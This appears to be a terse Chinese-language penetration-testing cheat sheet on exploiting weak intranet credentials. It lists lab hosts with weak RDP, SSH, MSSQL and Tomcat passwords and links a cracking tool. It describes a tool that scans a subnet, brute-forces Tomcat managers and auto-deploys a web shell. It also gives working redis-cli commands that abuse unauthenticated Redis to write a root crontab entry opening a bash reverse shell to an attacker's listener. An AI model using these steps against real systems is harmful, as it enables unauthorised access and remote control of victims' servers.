0x01 内网弱口令
RDP、SMB弱口令 192.168.232.136 user1/user1*** win7
SSH弱口令 192.168.232.180 root/rootroot centos
MSSQL弱口令 192.168.232.135 sa/sa123*** win2012‐iis
Tomcat弱口令 http://192.168.111.145:8080/manager/html
Redis未授权
工具下载:
https://github.com/shack2/SNETCracker
0x02 RDP、SMB弱口令

0x02 MSSQL弱口令

0x03 SSH弱口令

0x04 Tomcat弱口令
使用方法
上传war.exe和666.war文件
运行 war.exe ‐‐cidr 172.17.2.0/24
会自动扫描C段的tomcat,并且跑弱口令。成功跑出则会自动部署war上传getshell。
扫描日志记录在当前文件夹下的log.txt里

0x05 Redis未授权
同样通过超级弱口令工具扫描redis
利用计划任务执行命令反弹shell
在redis以root权限运行时可以写crontab来执行命令反弹shell
先在自己的服务器上监听一个端口
nc ‐lvnp 7999
然后执行命令:
root@kali:## redis‐cli ‐h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash ‐i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
192.168.63.130:6379> config set dir /var/spool/cron/
192.168.63.130:6379> config set dbfilename root
192.168.63.130:6379> save
